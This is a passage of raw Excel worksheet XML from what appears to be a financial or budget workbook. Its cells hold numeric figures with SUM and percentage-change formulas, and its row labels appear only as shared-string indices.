        <f>(G7-F7)/F7*100</f>
        <v>-4.25531914893617</v>
      </c>
    </row>
    <row r="8" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A8" s="163"/>
      <c r="B8" s="168"/>
      <c r="C8" s="166"/>
      <c r="D8" s="160"/>
      <c r="E8" s="163" t="s">
        <v>2393</v>
      </c>
      <c r="F8" s="165"/>
      <c r="G8" s="165"/>
      <c r="H8" s="160"/>
    </row>
    <row r="9" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A9" s="163"/>
      <c r="B9" s="168"/>
      <c r="C9" s="166"/>
      <c r="D9" s="160"/>
      <c r="E9" s="163" t="s">
        <v>2394</v>
      </c>
      <c r="F9" s="165"/>
      <c r="G9" s="165"/>
      <c r="H9" s="160"/>
    </row>
    <row r="10" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A10" s="163"/>
      <c r="B10" s="168"/>
      <c r="C10" s="166"/>
      <c r="D10" s="160"/>
      <c r="E10" s="163" t="s">
        <v>2395</v>
      </c>
      <c r="F10" s="165"/>
      <c r="G10" s="166"/>
      <c r="H10" s="160"/>
    </row>
    <row r="11" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A11" s="163"/>
      <c r="B11" s="168"/>
      <c r="C11" s="166"/>
      <c r="D11" s="160"/>
      <c r="E11" s="163" t="s">
        <v>2396</v>
      </c>
      <c r="F11" s="165"/>
      <c r="G11" s="166"/>
      <c r="H11" s="160"/>
    </row>
    <row r="12" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A12" s="163"/>
      <c r="B12" s="168"/>
      <c r="C12" s="166"/>
      <c r="D12" s="160"/>
      <c r="E12" s="163" t="s">
        <v>2397</v>
      </c>
      <c r="F12" s="165"/>
      <c r="G12" s="165"/>
      <c r="H12" s="160"/>
    </row>
    <row r="13" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A13" s="163"/>
      <c r="B13" s="168"/>
      <c r="C13" s="166"/>
      <c r="D13" s="160"/>
      <c r="E13" s="163" t="s">
        <v>2398</v>
      </c>
      <c r="F13" s="165"/>
      <c r="G13" s="165"/>
      <c r="H13" s="160"/>
    </row>
    <row r="14" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A14" s="163"/>
      <c r="B14" s="168"/>
      <c r="C14" s="166"/>
      <c r="D14" s="160"/>
      <c r="E14" s="163" t="s">
        <v>2399</v>
      </c>
      <c r="F14" s="165"/>
      <c r="G14" s="160"/>
      <c r="H14" s="160"/>
    </row>
    <row r="15" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A15" s="163"/>
      <c r="B15" s="168"/>
      <c r="C15" s="166"/>
      <c r="D15" s="160"/>
      <c r="E15" s="163" t="s">
        <v>2400</v>
      </c>
      <c r="F15" s="165"/>
      <c r="G15" s="165"/>
      <c r="H15" s="160"/>
    </row>
    <row r="16" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A16" s="163"/>
      <c r="B16" s="168"/>
      <c r="C16" s="166"/>
      <c r="D16" s="160"/>
      <c r="E16" s="163" t="s">
        <v>2401</v>
      </c>
      <c r="F16" s="165"/>
      <c r="G16" s="165"/>
      <c r="H16" s="160"/>
    </row>
    <row r="17" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A17" s="169" t="s">
        <v>889</v>
      </c>
      <c r="B17" s="170">
        <f>SUM(B5:B16)</f>
        <v>1880</v>
      </c>
      <c r="C17" s="170">
        <f>SUM(C5:C16)</f>
        <v>1800</v>
      </c>
      <c r="D17" s="171">
        <f>SUM(D5:D16)</f>
        <v>-4.25531914893617</v>
      </c>
      <c r="E17" s="169" t="s">
        <v>927</v>
      </c>
      <c r="F17" s="169">
        <f t="shared" ref="F17:H17" si="0">SUM(F7:F16)</f>
        <v>1880</v>
      </c>
      <c r="G17" s="169">
        <f t="shared" si="0"/>
        <v>1800</v>
      </c>
      <c r="H17" s="171">
        <f t="shared" si="0"/>
        <v>-4.25531914893617</v>
      </c>
    </row>
    <row r="18" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A18" s="169"/>
      <c r="B18" s="170"/>
      <c r="C18" s="172"/>
      <c r="D18" s="160"/>
      <c r="E18" s="163"/>
      <c r="F18" s="165"/>
      <c r="G18" s="165"/>
      <c r="H18" s="160"/>
    </row>
    <row r="19" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A19" s="163"/>
      <c r="B19" s="168"/>
      <c r="C19" s="166"/>
      <c r="D19" s="160"/>
      <c r="E19" s="163" t="s">
        <v>2402</v>
      </c>
      <c r="F19" s="165"/>
      <c r="G19" s="165"/>
      <c r="H19" s="160"/>
    </row>
    <row r="20" s="143" customFormat="1" ht="26.25" customHeight="1" spans="1:8">
      <c r="A20" s="163" t="s">
        <v>2403</v>
      </c>
      <c r="B20" s="168"/>
      <c r="C20" s="166"/>
      <c r="D20" s="160"/>
      <c r="E20" s="163" t="s">
        <v>2404</v>
      </c>
      <c r="F20" s="168"/>
      <c r="G20" s="166"/>
      <c r="H20" s="160"/>
    </row>
    <row r="21" s="143" customFormat="1" ht="34.5" customHeight="1" spans="1:8">
      <c r="A21" s="173" t="s">
        <v>750</v>
      </c>
      <c r="B21" s="174">
        <f t="shared" ref="B21:H21" si="1">SUM(B17:B20)</f>
        <v>1880</v>
      </c>
      <c r="C21" s="174">
        <f t="shared" si="1"/>
        <v>1800</v>
      </c>
      <c r="D21" s="175">
        <f t="shared" si="1"/>
        <v>-4.25531914893617</v>
      </c>
      <c r="E21" s="173" t="s">
        <v>783</v>
      </c>
      <c r="F21" s="174">
        <f t="shared" si="1"/>
        <v>1880</v>
      </c>
      <c r="G21" s="174">
        <f t="shared" si="1"/>
        <v>1800</v>
      </c>
      <c r="H21" s="175">
        <f t="shared" si="1"/>
        <v>-4.25531914893617</v>
      </c>
    </row>
    <row r="22" spans="5:8">
      <c r="E22" s="176"/>
      <c r="F22" s="176"/>
      <c r="G22" s="176"/>
      <c r="H22" s="177"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="G3:H3"/>
  </mergeCells>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" fitToHeight="0" orientation="portrait"/>
  <headerFooter alignWithMargins="0"/>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:J37"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="7" topLeftCell="B14" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="H27" sqref="H27"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="25.4259259259259" style="85" customWidth="1"/>
    <col min="2" max="7" width="11.4259259259259" style="85" customWidth="1"/>
    <col min="8" max="16384" width="10.2777777777778" style="85"/>
  </cols>
  <sheetData>
    <row r="1" s="79" customFormat="1" ht="16.5" customHeight="1" spans="1:1">
      <c r="A1" s="86" t="s">
        <v>2409</v>
      </c>
    </row>
    <row r="2" s="80" customFormat="1" ht="26.25" customHeight="1" spans="1:7">
      <c r="A2" s="87" t="s">
        <v>2410</v>
      </c>
      <c r="B2" s="88"/>
      <c r="C2" s="88"/>
      <c r="D2" s="88"/>
      <c r="E2" s="88"/>
      <c r="F2" s="88"/>
      <c r="G2" s="88"/>
    </row>
    <row r="3" s="81" customFormat="1" ht="15.75" customHeight="1" spans="1:7">
      <c r="A3" s="89"/>
      <c r="B3" s="89"/>
      <c r="C3" s="89"/>
      <c r="D3" s="89"/>
      <c r="E3" s="89"/>
      <c r="F3" s="90" t="s">
        <v>373</v>
      </c>
      <c r="G3" s="90"/>
    </row>
    <row r="4" s="81" customFormat="1" ht="19.5" customHeight="1" spans="1:7">
      <c r="A4" s="118" t="s">
        <v>2411</v>
      </c>
      <c r="B4" s="119" t="s">
        <v>2412</v>
      </c>
      <c r="C4" s="120"/>
      <c r="D4" s="121"/>
      <c r="E4" s="119" t="s">
        <v>2413</v>
      </c>
      <c r="F4" s="120"/>
      <c r="G4" s="121"/>
    </row>
    <row r="5" s="81" customFormat="1" ht="19.5" customHeight="1" spans="1:7">
      <c r="A5" s="122"/>
      <c r="B5" s="123" t="s">
        <v>519</v>
      </c>
      <c r="C5" s="124" t="s">
        <v>829</v>
      </c>
      <c r="D5" s="125"/>
      <c r="E5" s="123" t="s">
        <v>519</v>
      </c>
      <c r="F5" s="124" t="s">
        <v>829</v>
      </c>
      <c r="G5" s="125"/>
    </row>
    <row r="6" s="82" customFormat="1" ht="24.75" customHeight="1" spans="1:7">
      <c r="A6" s="126"/>
      <c r="B6" s="126"/>
      <c r="C6" s="127" t="s">
        <v>378</v>
      </c>
      <c r="D6" s="128" t="s">
        <v>619</v>
      </c>
      <c r="E6" s="126"/>
      <c r="F6" s="127" t="s">
        <v>378</v>
      </c>
      <c r="G6" s="128" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="7" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A7" s="129" t="s">
        <v>2414</v>
      </c>
      <c r="B7" s="130">
        <f>SUM(B8:B21)</f>
        <v>43677</v>
      </c>
      <c r="C7" s="130">
        <f>SUM(C8:C21)</f>
        <v>46676</v>
      </c>
      <c r="D7" s="104">
        <f>(C7-B7)/B7*100</f>
        <v>6.86631407834787</v>
      </c>
      <c r="E7" s="130">
        <f>SUM(E8:E21)</f>
        <v>16443</v>
      </c>
      <c r="F7" s="130">
        <f>SUM(F8:F21)</f>
        <v>19920</v>
      </c>
      <c r="G7" s="104">
        <f>(F7-E7)/E7*100</f>
        <v>21.1457763181901</v>
      </c>
    </row>
    <row r="8" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A8" s="102" t="s">
        <v>2415</v>
      </c>
      <c r="B8" s="103">
        <v>20831</v>
      </c>
      <c r="C8" s="103">
        <v>22389</v>
      </c>
      <c r="D8" s="104">
        <f t="shared" ref="D8:D36" si="0">(C8-B8)/B8*100</f>
        <v>7.47923767461956</v>
      </c>
      <c r="E8" s="103">
        <v>4639</v>
      </c>
      <c r="F8" s="103">
        <v>5619</v>
      </c>
      <c r="G8" s="104">
        <f>(F8-E8)/E8*100</f>
        <v>21.1252425091615</v>
      </c>
      <c r="I8" s="140"/>
    </row>
    <row r="9" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A9" s="102" t="s">
        <v>2416</v>
      </c>
      <c r="B9" s="103">
        <v>9478</v>
      </c>
      <c r="C9" s="103">
        <v>9965</v>
      </c>
      <c r="D9" s="104">
        <f t="shared" si="0"/>
        <v>5.13821481325174</v>
      </c>
      <c r="E9" s="103">
        <v>8816</v>
      </c>
      <c r="F9" s="103">
        <v>10681</v>
      </c>
      <c r="G9" s="104">
        <f t="shared" ref="G9:G27" si="1">(F9-E9)/E9*100</f>
        <v>21.1547186932849</v>
      </c>
      <c r="I9" s="140"/>
    </row>
    <row r="10" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A10" s="102" t="s">
        <v>2417</v>
      </c>
      <c r="B10" s="103">
        <v>2164</v>
      </c>
      <c r="C10" s="103">
        <v>2208</v>
      </c>
      <c r="D10" s="104">
        <f t="shared" si="0"/>
        <v>2.03327171903882</v>
      </c>
      <c r="E10" s="103">
        <v>748</v>
      </c>
      <c r="F10" s="103">
        <v>906</v>
      </c>
      <c r="G10" s="104">
        <f t="shared" si="1"/>
        <v>21.1229946524064</v>
      </c>
      <c r="I10" s="140"/>
    </row>
    <row r="11" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A11" s="102" t="s">
        <v>2418</v>
      </c>
      <c r="B11" s="103">
        <v>1580</v>
      </c>
      <c r="C11" s="103">
        <v>1593</v>
      </c>
      <c r="D11" s="104">
        <f t="shared" si="0"/>
        <v>0.822784810126582</v>
      </c>
      <c r="E11" s="103">
        <v>21</v>
      </c>
      <c r="F11" s="103">
        <v>25</v>
      </c>
      <c r="G11" s="104">
        <f t="shared" si="1"/>
        <v>19.047619047619</v>
      </c>
      <c r="I11" s="140"/>
    </row>
    <row r="12" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A12" s="102" t="s">
        <v>2419</v>
      </c>
      <c r="B12" s="103">
        <v>1829</v>
      </c>
      <c r="C12" s="103">
        <v>1853</v>
      </c>
      <c r="D12" s="104">
        <f t="shared" si="0"/>
        <v>1.31219245489338</v>
      </c>
      <c r="E12" s="103">
        <v>757</v>
      </c>
      <c r="F12" s="103">
        <v>918</v>
      </c>
      <c r="G12" s="104">
        <f t="shared" si="1"/>
        <v>21.2681638044914</v>
      </c>
      <c r="I12" s="140"/>
    </row>
    <row r="13" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A13" s="102" t="s">
        <v>2420</v>
      </c>
      <c r="B13" s="103">
        <v>4819</v>
      </c>
      <c r="C13" s="103">
        <v>5035</v>
      </c>
      <c r="D13" s="104">
        <f t="shared" si="0"/>
        <v>4.48225772981946</v>
      </c>
      <c r="E13" s="103">
        <v>1504</v>
      </c>
      <c r="F13" s="103">
        <v>1822</v>
      </c>
      <c r="G13" s="104">
        <f t="shared" si="1"/>
        <v>21.1436170212766</v>
      </c>
      <c r="I13" s="140"/>
    </row>
    <row r="14" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A14" s="102" t="s">
        <v>2421</v>
      </c>
      <c r="B14" s="103">
        <v>748</v>
      </c>
      <c r="C14" s="103">
        <v>772</v>
      </c>
      <c r="D14" s="104">
        <f t="shared" si="0"/>
        <v>3.20855614973262</v>
      </c>
      <c r="E14" s="103">
        <v>232</v>
      </c>
      <c r="F14" s="103">
        <v>281</v>
      </c>
      <c r="G14" s="104">
        <f t="shared" si="1"/>
        <v>21.1206896551724</v>
      </c>
      <c r="I14" s="140"/>
    </row>
    <row r="15" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A15" s="102" t="s">
        <v>2422</v>
      </c>
      <c r="B15" s="103">
        <v>2238</v>
      </c>
      <c r="C15" s="103">
        <v>2277</v>
      </c>
      <c r="D15" s="104">
        <f t="shared" si="0"/>
        <v>1.7426273458445</v>
      </c>
      <c r="E15" s="103">
        <v>955</v>
      </c>
      <c r="F15" s="103">
        <v>1157</v>
      </c>
      <c r="G15" s="104">
        <f t="shared" si="1"/>
        <v>21.151832460733</v>
      </c>
      <c r="I15" s="140"/>
    </row>
    <row r="16" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A16" s="102" t="s">
        <v>2423</v>
      </c>
      <c r="B16" s="103">
        <v>-701</v>
      </c>
      <c r="C16" s="103">
        <v>-105</v>
      </c>
      <c r="D16" s="104">
        <f t="shared" si="0"/>
        <v>-85.0213980028531</v>
      </c>
      <c r="E16" s="103">
        <v>-1254</v>
      </c>
      <c r="F16" s="103">
        <v>-1519</v>
      </c>
      <c r="G16" s="104">
        <f t="shared" si="1"/>
        <v>21.1323763955343</v>
      </c>
      <c r="I16" s="140"/>
    </row>
    <row r="17" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A17" s="102" t="s">
        <v>2424</v>
      </c>
      <c r="B17" s="103">
        <v>1</v>
      </c>
      <c r="C17" s="103">
        <v>1</v>
      </c>
      <c r="D17" s="104">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E17" s="103"/>
      <c r="F17" s="103"/>
      <c r="G17" s="104"/>
      <c r="I17" s="140"/>
    </row>
    <row r="18" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A18" s="102" t="s">
        <v>2425</v>
      </c>
      <c r="B18" s="103"/>
      <c r="C18" s="103"/>
      <c r="D18" s="104"/>
      <c r="E18" s="103"/>
      <c r="F18" s="103"/>
      <c r="G18" s="104"/>
      <c r="I18" s="140"/>
    </row>
    <row r="19" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A19" s="102" t="s">
        <v>2426</v>
      </c>
      <c r="B19" s="103"/>
      <c r="C19" s="103"/>
      <c r="D19" s="104"/>
      <c r="E19" s="103">
        <v>4</v>
      </c>
      <c r="F19" s="103">
        <v>5</v>
      </c>
      <c r="G19" s="104">
        <f t="shared" si="1"/>
        <v>25</v>
      </c>
      <c r="I19" s="140"/>
    </row>
    <row r="20" s="81" customFormat="1" ht="18" customHeight="1" spans="1:9">
      <c r="A20" s="102" t="s">
        <v>2427</v>
      </c>
      <c r="B20" s="103">
        <v>92</v>
      </c>
      <c r="C20" s="103">
        <v>98</v>
      </c>
      <c r="D20" s="104">
        <f t="shared" si="0"/>
        <v>6.52173913043478</v>
      </c>
      <c r="E20" s="103">
        <v>21</v>
      </c>
      <c r="F20" s="103">
        <v>25</v>
      </c>
      <c r="G20" s="104">
        <f t="shared" si="1"/>
        <v>19.047619047619</v>
      </c>
      <c r="I20" s="140"/>
    </row>
    <row r="21" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A21" s="102" t="s">
        <v>2428</v>
      </c>
      <c r="B21" s="103">
        <v>598</v>
      </c>
      <c r="C21" s="103">
        <v>590</v>
      </c>
      <c r="D21" s="104">
        <f t="shared" si="0"/>
        <v>-1.33779264214047</v>
      </c>
      <c r="E21" s="103"/>
      <c r="F21" s="103"/>
      <c r="G21" s="104"/>
    </row>
    <row r="22" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A22" s="102" t="s">
        <v>2429</v>
      </c>
      <c r="B22" s="109"/>
      <c r="C22" s="103"/>
      <c r="D22" s="104"/>
      <c r="E22" s="109"/>
      <c r="F22" s="109"/>
      <c r="G22" s="104"/>
    </row>
    <row r="23" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A23" s="102" t="s">
        <v>2430</v>
      </c>
      <c r="B23" s="103"/>
      <c r="C23" s="103"/>
      <c r="D23" s="104"/>
      <c r="E23" s="103"/>
      <c r="F23" s="103"/>
      <c r="G23" s="104"/>
    </row>
    <row r="24" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A24" s="102" t="s">
        <v>2431</v>
      </c>
      <c r="B24" s="103"/>
      <c r="C24" s="103"/>
      <c r="D24" s="104"/>
      <c r="E24" s="103"/>
      <c r="F24" s="103"/>
      <c r="G24" s="104"/>
    </row>
    <row r="25" s="81" customFormat="1" ht="25.2" spans="1:7">
      <c r="A25" s="102" t="s">
        <v>2432</v>
      </c>
      <c r="B25" s="103"/>
      <c r="C25" s="103"/>
      <c r="D25" s="104"/>
      <c r="E25" s="103"/>
      <c r="F25" s="103"/>
      <c r="G25" s="104"/>
    </row>
    <row r="26" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A26" s="102" t="s">
        <v>2433</v>
      </c>
      <c r="B26" s="103"/>
      <c r="C26" s="103"/>
      <c r="D26" s="104"/>
      <c r="E26" s="103"/>
      <c r="F26" s="103"/>
      <c r="G26" s="104"/>
    </row>
    <row r="27" s="83" customFormat="1" ht="18" customHeight="1" spans="1:8">
      <c r="A27" s="131" t="s">
        <v>2434</v>
      </c>
      <c r="B27" s="106">
        <f>SUM(B7+B22)</f>
        <v>43677</v>
      </c>
      <c r="C27" s="106">
        <f>SUM(C7+C22)</f>
        <v>46676</v>
      </c>
      <c r="D27" s="107">
        <f>(C27-B27)/B27*100</f>
        <v>6.86631407834787</v>
      </c>
      <c r="E27" s="106">
        <f>E7+E22</f>
        <v>16443</v>
      </c>
      <c r="F27" s="106">
        <f>F7+F22</f>
        <v>19920</v>
      </c>
      <c r="G27" s="107">
        <f t="shared" si="1"/>
        <v>21.1457763181901</v>
      </c>
      <c r="H27" s="132"/>
    </row>
    <row r="28" s="81" customFormat="1" ht="18" customHeight="1" spans="1:10">
      <c r="A28" s="108" t="s">
        <v>2435</v>
      </c>
      <c r="B28" s="109"/>
      <c r="C28" s="109"/>
      <c r="D28" s="104"/>
      <c r="E28" s="109"/>
      <c r="F28" s="109"/>
      <c r="G28" s="104"/>
      <c r="J28" s="140"/>
    </row>
    <row r="29" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A29" s="108" t="s">
        <v>2436</v>
      </c>
      <c r="B29" s="133"/>
      <c r="C29" s="133"/>
      <c r="D29" s="104"/>
      <c r="E29" s="133"/>
      <c r="F29" s="133"/>
      <c r="G29" s="104"/>
    </row>
    <row r="30" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A30" s="108" t="s">
        <v>2437</v>
      </c>
      <c r="B30" s="110">
        <f>SUM(B31:B35)</f>
        <v>4959</v>
      </c>
      <c r="C30" s="110">
        <f>SUM(C31:C35)</f>
        <v>4820</v>
      </c>
      <c r="D30" s="104">
        <f t="shared" si="0"/>
        <v>-2.80298447267594</v>
      </c>
      <c r="E30" s="110">
        <f>SUM(E31:E35)</f>
        <v>5590</v>
      </c>
      <c r="F30" s="110">
        <f>SUM(F31:F35)</f>
        <v>6772</v>
      </c>
      <c r="G30" s="104">
        <f t="shared" ref="G30:G36" si="2">(F30-E30)/E30*100</f>
        <v>21.1449016100179</v>
      </c>
    </row>
    <row r="31" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A31" s="134" t="s">
        <v>2438</v>
      </c>
      <c r="B31" s="135">
        <v>3928</v>
      </c>
      <c r="C31" s="136">
        <v>3874</v>
      </c>
      <c r="D31" s="104">
        <f t="shared" si="0"/>
        <v>-1.37474541751527</v>
      </c>
      <c r="E31" s="112">
        <v>4733</v>
      </c>
      <c r="F31" s="136">
        <v>5734</v>
      </c>
      <c r="G31" s="104">
        <f t="shared" si="2"/>
        <v>21.1493767166702</v>
      </c>
    </row>
    <row r="32" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A32" s="137" t="s">
        <v>2439</v>
      </c>
      <c r="B32" s="112">
        <v>1031</v>
      </c>
      <c r="C32" s="112">
        <v>946</v>
      </c>
      <c r="D32" s="104">
        <f t="shared" si="0"/>
        <v>-8.24442289039767</v>
      </c>
      <c r="E32" s="112">
        <v>857</v>
      </c>
      <c r="F32" s="112">
        <v>1038</v>
      </c>
      <c r="G32" s="104">
        <f t="shared" si="2"/>
        <v>21.120186697783</v>
      </c>
    </row>
    <row r="33" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A33" s="137" t="s">
        <v>2440</v>
      </c>
      <c r="B33" s="112"/>
      <c r="C33" s="112"/>
      <c r="D33" s="104"/>
      <c r="E33" s="112"/>
      <c r="F33" s="112"/>
      <c r="G33" s="104"/>
    </row>
    <row r="34" s="81" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A34" s="134" t="s">
        <v>415</v>
      </c>
      <c r="B34" s="112"/>
      <c r="C34" s="112"/>
      <c r="D34" s="104"/>
      <c r="E34" s="112"/>
      <c r="F34" s="112"/>
      <c r="G34" s="104"/>
    </row>
    <row r="35" s="81" customFormat="1" ht="13.2" spans="1:7">
      <c r="A35" s="134" t="s">
        <v>413</v>
      </c>
      <c r="B35" s="112"/>
      <c r="C35" s="112"/>
      <c r="D35" s="104"/>
      <c r="E35" s="112"/>
      <c r="F35" s="112"/>
      <c r="G35" s="104"/>
    </row>
    <row r="36" s="84" customFormat="1" ht="18" customHeight="1" spans="1:7">
      <c r="A36" s="138" t="s">
        <v>2441</v>
      </c>
      <c r="B36" s="114">
        <f>B27+B28+B30</f>
        <v>48636</v>
      </c>
      <c r="C36" s="114">
        <f t="shared" ref="B36:F36" si="3">C27+C28+C30</f>
        <v>51496</v>
      </c>
      <c r="D36" s="115">
        <f t="shared" si="0"/>
        <v>5.88041779751624</v>
      </c>
      <c r="E36" s="114">
        <f t="shared" si="3"/>
        <v>22033</v>
      </c>
      <c r="F36" s="114">
        <f t="shared" si="3"/>
        <v>26692</v>
      </c>
      <c r="G36" s="115">
        <f t="shared" si="2"/>
        <v>21.1455543956792</v>
      </c>
    </row>
    <row r="37" ht="13.2" spans="1:7">
      <c r="A37" s="139"/>
      <c r="B37" s="139"/>
      <c r="C37" s="139"/>
      <c r="D37" s="139"/>
      <c r="E37" s="139"/>
      <c r="F37" s="139"/>
      <c r="G37" s="139"/>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="F3:G3"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="C5:D5"/>
    <mergeCell ref="F5:G5"/>
    <mergeCell ref="A4:A6"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="E5:E6"/>
  </mergeCells>
  <pageMargins left="0.472222222222222" right="0.196527777777778" top="0.45" bottom="1" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" orientation="portrait"/>
  <headerFooter alignWithMargins="0"/>
  <ignoredErrors>
    <ignoredError sqref="D7:D15 D22:D36 E35:F35 B28:C29" unlockedFormula="1"/>
  </ignoredErrors>
</worksheet>
</file>

<file path=xl/worksheets/sheet7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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:J36"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="2" ySplit="7" topLeftCell="C17" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B29" sqref="B29:C30"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6"/>
  <cols>
    <col min="1" max="1" width="30.7222222222222" style="85" customWidth="1"/>
    <col min="2" max="7" width="12" style="85" customWidth="1"/>
    <col min="8" max="16384" width="10.2777777777778" style="85"/>
  </cols>
  <sheetData>
    <row r="1" s="79" customFormat="1" ht="16.5" customHeight="1" spans="1:1">
      <c r="A1" s="86" t="s">
        <v>2442</v>
      </c>
    </row>
    <row r="2" s="80" customFormat="1" ht="26.25" customHeight="1" spans="1:7">
      <c r="A2" s="87" t="s">
        <v>2443</v>
      </c>
      <c r="B2" s="88"/>
      <c r="C2" s="88"/>
      <c r="D2" s="88"/>
      <c r="E2" s="88"/>
      <c r="F2" s="88"/>
      <c r="G2" s="88"/>
    </row>
    <row r="3" s="81" customFormat="1" ht="15.75" customHeight="1" spans="1:7">
      <c r="A3" s="89"/>
      <c r="B3" s="89"/>
      <c r="C3" s="89"/>
      <c r="D3" s="89"/>
      <c r="E3" s="89"/>
      <c r="F3" s="90" t="s">
        <v>373</v>
      </c>
      <c r="G3" s="90"/>
    </row>
    <row r="4" s="81" customFormat="1" ht="20.25" customHeight="1" spans="1:7">
      <c r="A4" s="91" t="s">
        <v>2444</v>
      </c>
      <c r="B4" s="92" t="s">
        <v>2412</v>
      </c>
      <c r="C4" s="93"/>
      <c r="D4" s="94"/>
      <c r="E4" s="92" t="s">
        <v>2413</v>
      </c>
      <c r="F4" s="93"/>
      <c r="G4" s="94"/>
    </row>
    <row r="5" s="81" customFormat="1" ht="20.25" customHeight="1" spans="1:7">
      <c r="A5" s="95"/>
      <c r="B5" s="96" t="s">
        <v>2445</v>
      </c>
      <c r="C5" s="97" t="s">
        <v>2446</v>
      </c>
      <c r="D5" s="98"/>
      <c r="E5" s="96" t="s">
        <v>2445</v>
      </c>
      <c r="F5" s="97" t="s">
        <v>2446</v>
      </c>
      <c r="G5" s="98"/>
    </row>
    <row r="6" s="82" customFormat="1" ht="24.95" customHeight="1" spans="1:7">
      <c r="A6" s="99"/>
      <c r="B6" s="99"/>
      <c r="C6" s="100" t="s">
        <v>378</v>
      </c>
      <c r="D6" s="101" t="s">
        <v>2447</v>
      </c>
      <c r="E6" s="99"/>
      <c r="F6" s="100" t="s">
        <v>378</v>
      </c>
      <c r="G6" s="101" t="s">
        <v>2447</v>
      </c>
    </row>
    <row r="7" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A7" s="102" t="s">
        <v>2448</v>
      </c>
      <c r="B7" s="103">
        <v>4115</v>
      </c>
      <c r="C7" s="103">
        <v>4396</v>
      </c>
      <c r="D7" s="104">
        <f>(C7-B7)/B7*100</f>
        <v>6.82867557715674</v>
      </c>
      <c r="E7" s="103">
        <v>1543</v>
      </c>
      <c r="F7" s="103">
        <v>1870</v>
      </c>
      <c r="G7" s="104">
        <f>(F7-E7)/E7*100</f>
        <v>21.1924821775761</v>
      </c>
    </row>
    <row r="8" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A8" s="102" t="s">
        <v>2449</v>
      </c>
      <c r="B8" s="103"/>
      <c r="C8" s="103"/>
      <c r="D8" s="104"/>
      <c r="E8" s="103"/>
      <c r="F8" s="103"/>
      <c r="G8" s="104"/>
    </row>
    <row r="9" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:7">
      <c r="A9" s="102" t="s">
        <v>2450</v>
      </c>
      <c r="B9" s="103"/>
      <c r="C9" s="103"/>
      <c r="D9" s="104"/>
      <c r="E9" s="103"/>
      <c r="F9" s="103"/>
      <c r="G9" s="104"/>
    </row>
    <row r="10" s="81" customFormat="1" ht="27.75" customHeight="1" spans="1:8">
      <c r="A10" s="102" t="s">
        <v>2451</v>
      </c>
      <c r="B10" s="103"/>
      <c r="C10" s="103"/>
      <c r="D10" s="104"/>
      <c r="E10" s="103"/>
      <c r="F10" s="103"/>
